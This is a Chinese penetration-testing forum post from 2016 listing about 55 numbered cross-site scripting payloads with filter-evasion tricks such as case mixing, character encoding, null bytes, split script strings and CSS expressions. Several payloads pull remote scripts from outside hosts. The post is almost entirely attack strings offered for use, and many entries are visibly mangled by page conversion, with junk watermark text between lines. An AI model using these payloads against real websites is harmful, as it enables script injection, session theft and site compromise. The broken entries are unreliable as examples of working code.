中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2016-4-28 10:06
标题:
XSS攻击汇总
(1)普通的XSS JavaScript注入
( e+ n# S; L/ ]5 ]$ J
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 z% n( ^% a8 [! i) P# u; U3 p
(99)另类弹框
2 d0 x, J1 t2 f, _. ?3 u1 J
<q/oncut=alert()>1
$ I$ x$ `' Y, N3 [" q
<s/onclick=alert()>b
8 \8 Y. O- N2 r4 q! x6 L
<XSS=" onclick="alert(1)//">clickme</SSX=">
. ?+ ]. u( G; i3 D6 X
<zzz onclick=alert`1`>clickme</zzz>
$ I# _8 {! \! y3 t" ` W; ]
<a onclick=alert`1`>clickme</a>
2 e& K! E; y- e( C/ [6 j* i& \! t
<a=">clickme</a=">
0 f% k2 u& T$ s' p1 P5 ]
<a=">clickme</a>
0 t0 y( Z6 R7 w9 {0 g
<z=">clickme</z=">
9 U! Y o, _7 Q% d
<z onclick=alert`1`>clickme</z>
$ I& T1 q+ \- h, Z
1 L: O+ `, p: h' y8 N1 u
(2)IMG标签XSS使用JavaScript命令
$ d* N3 p$ N: k4 w- r5 i$ s2 W
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 n2 m0 K3 t& S; }
& v/ B6 H8 y) ] u
(3)IMG标签无分号无引号
0 C7 D9 k8 B: y. a- y$ n
<IMG SRC=javascript:alert(‘XSS’)>
% U3 V- ~* P5 |( e0 z/ j
4 f+ ?8 c: u) t9 F- [1 Z) W
(4)IMG标签大小写不敏感
3 y8 w' ?& F% k5 w; D
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 a4 W' Q& ~8 m6 R1 b
7 {0 }. h* Q4 [ ^ `
(5)HTML编码(必须有分号)
8 Z- e1 M, [( u( a9 t4 O, {
<IMG SRC=javascript:alert(“XSS”)>
- e4 r J+ `2 |5 Y$ W1 x
, a$ U- S5 `6 A) w' ^
(6)修正缺陷IMG标签
9 C: d. ?3 y8 r; p& L2 ]! _% b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* i" O- ] c# t3 Z E
$ x% ^9 {. L6 a. m5 v3 v/ M; Z
(7)formCharCode标签(
计算器
)
( B( R+ F, L( h: d% g
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
4 y9 w. v- S, t+ E+ {% j+ k
/ m' [. W: j# L
(8)UTF-8的Unicode编码(
计算器
)
) E8 q1 _8 N" f. A% W
<IMG SRC=jav..省略..S')>
$ _* x& o4 Z# ?! B
6 m0 ]* m n' k0 X$ m4 I' }
(9)7位的UTF-8的Unicode编码是没有分号的(
计算器
)
, G/ W* O4 ]- J# h% }7 L% s: A# F
<IMG SRC=jav..省略..S')>
* o! U6 }; Y! g
( K6 \0 o$ ~6 q; _8 r+ z$ L% r" `
(10)十六进制编码也是没有分号(
计算器
)
w, {. s' ^# t+ ~; R C
<IMG SRC=\'#\'" /span>
: Z5 G9 ~# [% u; X6 V0 D1 j
$ l8 ?, F: O+ P5 ^2 D" e2 Z
(11)嵌入式标签,将Javascript分开
1 o; ]/ M( U0 j2 @3 W( }. a; Z
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 Z$ ]8 c, @( f$ }4 B
1 L5 m3 U e; `+ |" H2 s
(12)嵌入式编码标签,将Javascript分开
! B! ]# ^/ L/ ]: n3 q/ t
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
" N7 l: L9 L8 S( D# r
$ x W G+ U$ s* W* h& Z; |
(13)嵌入式换行符
; B( L, A( J. t
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
% K( b2 x& [9 h# e
1 s& A9 ~ V- I3 n; J# V/ ^
(14)嵌入式回车
( F( v1 F5 I, ?6 k
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
0 J6 f8 Q. a* R0 M4 m- X* ^
/ W$ ^2 u8 L, v. F5 X& C% Q# N
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 D6 Y; C3 b8 Y# B5 G' f) B. {7 Z
<IMG SRC=\'#\'" /span>
7 H% n- s1 | M- I2 M2 C7 g
+ j1 b; F* Y1 \* q! h
(16)解决限制字符(要求同页面)
/ Y( M" R/ ?! h) L
<script>z=’document.’</script>
4 s5 [+ D2 O& r
<script>z=z+’write(“‘</script>
, X) n z, V0 j2 y3 C
<script>z=z+’<script’</script>
# F. {& Z- P; B$ ?" ^& V% A
<script>z=z+’ src=ht’</script>
: d0 d8 U* `( ^8 p4 q% k( E. X
<script>z=z+’tp://ww’</script>
8 U h% Y9 G" R
<script>z=z+’w.shell’</script>
2 T/ H9 ]7 D; [; Q( x6 y3 j
<script>z=z+’.net/1.’</script>
9 T% k% M/ l& O/ G$ O4 s+ |
<script>z=z+’js></sc’</script>
8 h1 d+ u0 b8 g- z
<script>z=z+’ript>”)’</script>
9 L3 l) x' Q5 F/ r) S7 G
<script>eval_r(z)</script>
& z$ `* J7 a) W; t) \
, c7 g2 S; _' H, Y" e+ a# R
(17)空字符
8 ~5 H0 ^, c$ U8 a7 e, _, M
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
4 @1 g% Y- o2 E0 b n+ v$ _# w
9 B3 x5 G: z2 P/ o% B. _ F
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
2 w) X* c5 E4 I2 l
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 n5 S/ M& I2 h7 z7 u
2 B( M& u5 N6 y' G) f
(19)Spaces和meta前的IMG标签
, a; l7 _0 `! h5 }- H: ~
<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
: s- a1 Z* c4 z1 Y! s* J" m3 m
' i2 {6 R1 A& x
(20)Non-alpha-non-digit XSS
8 z. Y# F/ v0 V) S, k5 A
<SCRIPT/XSS SRC=\'#\'" /span>
http://3w.org/XSS/xss.js
”></SCRIPT>
. [2 d2 x; g( i( r! n6 E# ?9 w3 J
* S# c y0 m I* c$ N
(21)Non-alpha-non-digit XSS to 2
) x$ P u" W( R0 F
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
& Z8 u4 \+ K! ~, P. r
# k9 R6 \$ E! m0 [4 ]
(22)Non-alpha-non-digit XSS to 3
% g+ o# Q; Z1 i# b8 I% {( }
<SCRIPT/SRC=\'#\'" /span>
http://3w.org/XSS/xss.js
”></SCRIPT>
0 x+ D' h# p- r
0 |) T9 P% V& V7 z; g z* B- {' {7 D
(23)双开括号
/ F3 g" d. f- A r- D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
5 @" {8 s- a" ?. L
0 {4 v: m) _% c' u; {- b# e
(24)无结束脚本标记(仅火狐等浏览器)
; ?2 |8 N; H5 @# }" `! h
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
' B& R1 p" i( X* e7 @/ c. ` l
$ d! ^& `/ D0 q8 r1 [
(25)无结束脚本标记2
$ L5 ~6 g9 V$ o, `+ f3 o
<SCRIPT SRC=//3w.org/XSS/xss.js>
# N: x0 O/ G# R9 H# x
& W3 O9 Z# F9 U
(26)半开的HTML/JavaScript XSS
3 M; R$ F; L0 v6 ` U' b- w. `
<IMG SRC=\'#\'" /span>
8 i5 @) H6 d$ \
1 W" k7 ^ e0 \
(27)双开角括号
. w$ C* @/ c9 U0 A% p U6 z# r/ ]6 w
<iframe src=http://3w.org/XSS.html <
& N7 N$ j+ }8 h$ y y* C9 J T
/ Z& y3 z4 ` U) u5 I, j
(28)无单引号 双引号 分号
& c3 N' _& t/ q; Z6 a7 e3 ]
<SCRIPT>a=/XSS/
y2 o; `$ r$ b A
alert(a.source)</SCRIPT>
6 Z4 k% } h! w, r2 C4 A. }
: T8 K* j+ s4 C9 A- l
(29)换码过滤的JavaScript
, `" }4 y) |! O
\”;alert(‘XSS’);//
. O" \' F6 \2 F4 U8 S7 ?
& }. Q; ^1 `( f) e9 E
(30)结束Title标签
$ D! p9 `0 r% V5 e
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! f! S+ G8 L# L( ~% m+ g- \/ |
/ l1 `8 e1 P/ r- v
(31)Input Image
- F4 d4 j0 F: ]; V
<INPUT SRC=\'#\'" /span>
! y& _9 y. n1 R9 a, H
! Y. y# g$ ^1 i5 F1 |& T& N) Y
(32)BODY Image
: D# G1 b6 |- k) P: q
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 `# U( k3 ]7 y- I. d
& g( ?) d& ?8 d1 k, x8 F7 ^
(33)BODY标签
9 Y0 S% g/ m7 B4 D/ Y
<BODY(‘XSS’)>
* r' [1 S+ D/ o" L
9 I6 x+ `0 S y- q0 C
(34)IMG Dynsrc
2 S" L" ^; [4 Z
<IMG DYNSRC=\'#\'" /span>
! S1 m8 D, y8 K, F7 I7 ~7 r
2 D5 C6 h" A3 p8 \
(35)IMG Lowsrc
+ b9 _; K3 U8 ], c3 }% V
<IMG LOWSRC=\'#\'" /span>
0 b( a( ^1 T9 S0 D1 L
+ C. L7 F$ T0 V, T- t) P! Z
(36)BGSOUND
* W: v0 E: Y, h9 ?
<BGSOUND SRC=\'#\'" /span>
# E# r4 V6 [* I* T: h
: F3 M/ v7 l8 L& W9 Q! Q
(37)STYLE sheet
$ R) f/ j) ~) y2 J' D5 r
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
1 a4 ^# J L+ Y1 h9 l7 P
- [5 y/ L: j2 Q4 ~# Q% q8 K$ C
(38)远程样式表
. x* j8 h% u7 Z2 n$ _, N& S$ c* q
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
" d+ J9 i4 R- \ W: H
" J; W' m# _: D
(39)List-style-image(列表式)
( S$ K8 |! c* x
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
) m# `! R. }% o7 t2 {" P. P- ~
1 w! W" p4 Q, C& ~
(40)IMG VBscript
7 A z2 C- W4 P* Z$ R5 ~8 x
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
& R1 s1 q0 ?* s, s1 F
( x/ w- q( u- ^7 M" M0 B
(41)META链接url
0 H% A% @; ~- c( w; |0 X5 U" r0 o
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
9 a4 D ~6 e% ^
0 h/ G4 @9 g, F6 J& X( k0 J9 m4 m
(42)Iframe
w5 }4 O, E8 O3 L, R2 u& d: }6 |
<IFRAME SRC=\'#\'" /IFRAME>
1 _+ h3 c# J& p7 \( T
# A( n% d6 b) M+ d I4 B
(43)Frame
" H/ T. c- }6 X x" J
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
1 ] B7 i. j% k0 R, x4 t( i
2 r; {" j m7 y: X( s. Y
(44)Table
* p/ g2 p# s3 |/ D
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ o4 x% ?5 ?2 e8 N: ]
! l1 E; Z; s6 F! [& m3 V
(45)TD
% r- K/ K+ V" g6 N
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! o" e& B8 H2 k
! X# s" d+ O9 r' T
(46)DIV background-image
. X- `1 G2 R5 [' U8 A2 Y8 N
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ z! A9 n' a4 M: T9 U
9 ?7 L, M# F. |9 c- F$ D( M( U
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 _4 x5 S0 U+ s7 Y- @# \& w
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, @$ A: G+ Y+ H3 j" o7 C
0 V( ]- k3 k- V5 s8 w
(48)DIV expression
7 o0 v8 c% \3 a* ^3 D
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
& P0 I8 T9 q* O3 E
# P" W' n) h) p( y3 d3 J7 [# M
(49)STYLE属性分拆表达
8 j1 @% S( D+ c4 }
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: T- f% b* y' V
G6 s9 W: ?' j& ^+ G2 P1 t
(50)匿名STYLE(组成:开角号和一个字母开头)
7 m. @7 n# k. P, `- S
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ Q3 E. Z: }6 [
3 F! ?, T9 p0 u {/ o: }
(51)STYLE background-image
. d+ t: }* g* g1 F; o$ Z q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
' \: z6 c7 ]4 k1 X9 C
3 {# T H" r% w2 E1 ^1 }
(52)IMG STYLE方式
# H) }5 F0 k$ P% u
exppression(alert(“XSS”))’>
) m' Z0 |! o: `: E. w
0 T2 f" I6 p8 Z- L) d$ U0 s7 T+ ~
(53)STYLE background
- P" B# w% \3 K& C8 j
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 [7 Q- ^. P/ s. S
7 R7 c& A, a6 v5 j; @1 h4 M
(54)BASE
% _9 a, D, p* m. L3 h
<BASE HREF=”javascript:alert(‘XSS’);//”>
% o$ x# X$ l) r- \# S/ j4 I
% z; H7 h# R* G; f% j! l5 X1 f
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
1 q* |( L+ g: _, X& s5 Q
<EMBED SRC=\'#\'" /span>
http://3w.org/XSS/xss.swf
” ></EMBED>
}! w6 G3 Z* `. h; {
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2